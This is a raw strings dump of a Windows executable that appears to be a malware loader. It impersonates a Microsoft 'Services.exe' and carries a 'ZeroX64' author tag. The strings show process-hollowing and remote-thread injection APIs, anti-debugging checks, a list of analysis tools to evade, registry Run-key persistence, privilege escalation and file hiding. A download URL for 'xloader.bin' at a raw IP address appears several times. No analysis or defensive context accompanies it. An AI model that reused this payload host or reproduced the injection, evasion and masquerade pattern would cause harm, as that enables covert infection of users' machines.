!This program cannot be run in DOS mode.
:,EF:&=
:JK~:-=
:JKO:$=
:JKH:$=
:Rich%=
`.rdata
@.data
.pdata
@.rsrc
@.reloc
D$pHc@<H
D$pHc@<H
D$pHc@<H
D$8Hc@<H
9D$0rT
9D$0s,
D$8Hc@<H
D$(H9D$
9D$Ps'
ZeroX64
Made in Algeria <3
ReflectiveLoader
Software\Microsoft\Windows\CurrentVersion\Run
wcscpy
LoadLibraryA
kernel32.dll
GetProcAddress
kernel32.dll
msvcrt.dll
wcscat
msvcrt.dll
wcscmp
msvcrt.dll
wcsncpy
msvcrt.dll
wcslen
msvcrt.dll
strlen
msvcrt.dll
realloc
msvcrt.dll
msvcrt.dll
wcsstr
msvcrt.dll
CloseHandle
kernel32.dll
CreateDirectoryA
kernel32.dll
GetFileAttributesA
kernel32.dll
GetModuleFileNameA
kernel32.dll
CopyFileA
kernel32.dll
GetWindowsDirectoryA
kernel32.dll
CreateFileA
kernel32.dll
HeapAlloc
kernel32.dll
GetProcessHeap
kernel32.dll
ExpandEnvironmentStringsW
kernel32.dll
ResumeThread
kernel32.dll
SetThreadContext
kernel32.dll
RtlCompareMemory
kernel32.dll
VirtualAllocEx
kernel32.dll
GetModuleHandleA
kernel32.dll
GetThreadContext
kernel32.dll
GetModuleFileNameW
kernel32.dll
VirtualProtectEx
kernel32.dll
GetLastError
kernel32.dll
ReleaseMutex
kernel32.dll
CreateMutexA
kernel32.dll
HeapFree
kernel32.dll
WaitForSingleObject
kernel32.dll
CreateThread
kernel32.dll
CheckRemoteDebuggerPresent
kernel32.dll
GetCurrentProcess
kernel32.dll
IsDebuggerPresent
kernel32.dll
ExitProcess
kernel32.dll
DeleteFileA
kernel32.dll
Process32NextW
kernel32.dll
TerminateProcess
kernel32.dll
OpenProcess
kernel32.dll
Process32FirstW
kernel32.dll
CreateToolhelp32Snapshot
kernel32.dll
SetEndOfFile
kernel32.dll
lstrcmpA
kernel32.dll
WriteProcessMemory
kernel32.dll
ReadProcessMemory
kernel32.dll
GetFileSize
kernel32.dll
WriteFile
kernel32.dll
AdjustTokenPrivileges
Advapi32.dll
OpenProcessToken
Advapi32.dll
LookupPrivilegeValueW
Advapi32.dll
GetTokenInformation
Advapi32.dll
CreateFileW
kernel32.dll
SHGetFolderPathW
shell32.dll
SHGetFolderPathA
shell32.dll
lstrcatA
kernel32.dll
SetFileAttributesA
kernel32.dll
SHGetKnownFolderPath
shell32.dll
FreeLibrary
kernel32.dll
MoveFileW
kernel32.dll
GetFileSizeEx
kernel32.dll
GetWindowsDirectoryA
kernel32.dll
GetVolumeInformationA
kernel32.dll
GetTickCount
kernel32.dll
wsprintfW
user32.dll
wsprintfA
user32.dll
VirtualAlloc
kernel32.dll
ReadFile
kernel32.dll
kernel32.dll
VirtualFree
kernel32.dll
SetFilePointer
kernel32.dll
CreateDirectoryW
kernel32.dll
FindFirstFileW
kernel32.dll
FindNextFileW
kernel32.dll
FindClose
kernel32.dll
CopyFileW
kernel32.dll
WriteFile
kernel32.dll
GetSystemDirectoryW
kernel32.dll
ExitProcess
kernel32.dll
CreateRemoteThread
kernel32.dll
InternetOpenUrlW
wininet.dll
InternetReadFile
wininet.dll
HttpQueryInfoA
wininet.dll
InternetOpenW
wininet.dll
InternetConnectW
wininet.dll
HttpOpenRequestW
wininet.dll
HttpSendRequestA
wininet.dll
InternetCloseHandle
wininet.dll
PathIsURLW
shlwapi.dll
PathCombineW
shlwapi.dll
PathFindFileNameW
shlwapi.dll
StrStrA
shlwapi.dll
URLDownloadToFileW
urlmon.dll
CreateProcessW
kernel32.dll
ShellExecuteW
shell32.dll
GetModuleFileNameW
kernel32.dll
GetShortPathNameW
kernel32.dll
GetEnvironmentVariableW
kernel32.dll
GetUserNameA
Advapi32.dll
RegDeleteKeyW
Advapi32.dll
RegOpenKeyExA
Advapi32.dll
RegSetValueExA
Advapi32.dll
RegCloseKey
Advapi32.dll
MessageBoxA
user32.dll
.reloc
NtUnmapViewOfSection
AlreadyInTask
rbNSpGEsyb
Services
worker_VznLpbPuTg
worker_ZLpjbmHstE
worker_pPCJtqmKMc
%08lX%04lX%lu
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Hidden
Services
GetProcAddress
LoadLibraryA
KERNEL32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
%SystemRoot%\system32\svchost.exe
%SystemRoot%\system32\msiexec.exe
%SystemRoot%\system32\audiodg.exe
http://176.111.174.140/api/xloader.bin
http://176.111.174.140/api/xloader.bin
ProcessHacker.exe
procexp.exe
procexp64.exe
TOTALCMD.exe
x64dbg.exe
idaq64.exe
idaq.exe
autoruns.exe
procmon.exe
http://176.111.174.140/api/xloader.bin
http://176.111.174.140/api/xloader.bin
svchost.exe
msiexec.exe
audiodg.exe
Unknown
explorer.exe
SeDebugPrivilege
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
Microsoft Corporation
FileDescription
System
FileVersion
1.0.0.1
InternalName
Services.exe
LegalCopyright
Copyright (C) 2024
OriginalFilename
Services.exe
ProductName
Services
ProductVersion
1.3.0.1
VarFileInfo
Translation